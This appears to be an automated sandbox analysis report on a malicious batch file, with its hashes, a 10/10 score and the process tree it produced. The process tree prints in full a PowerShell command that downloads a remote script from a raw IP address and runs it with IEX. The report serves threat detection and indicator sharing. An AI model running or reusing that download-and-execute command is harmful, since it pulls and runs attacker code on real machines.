Analysis
-
max time kernel
114s -
max time network
109s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
17-03-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
sGfuLFJL.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
sGfuLFJL.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
sGfuLFJL.bat
-
Size
193B
-
MD5
17c9f036750c9f73392ad5d300c77ef7
-
SHA1
e7f99574e7989564a222e10856daded5d49d5922
-
SHA256
ca270555bc105598de38c9103f8dd41470b6ea4ae35d5da3cfb75c27a7897204
-
SHA512
e5036da198a282c2ebdf7e0646d5aeeab5e28d20d7266b2cc7309569ab6770258a2f846a5f4470a03d07b63d16d3a0762f860aef106759ecf6be604e3df59d46
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/sGfuLFJL
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3820 4020 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3820 WerFault.exe Token: SeBackupPrivilege 3820 WerFault.exe Token: SeDebugPrivilege 3820 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe 3820 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sGfuLFJL.bat"1⤵PID:4000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/sGfuLFJL');Invoke-XQXAUMNJQV;Start-Sleep -s 10000"2⤵PID:4020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3820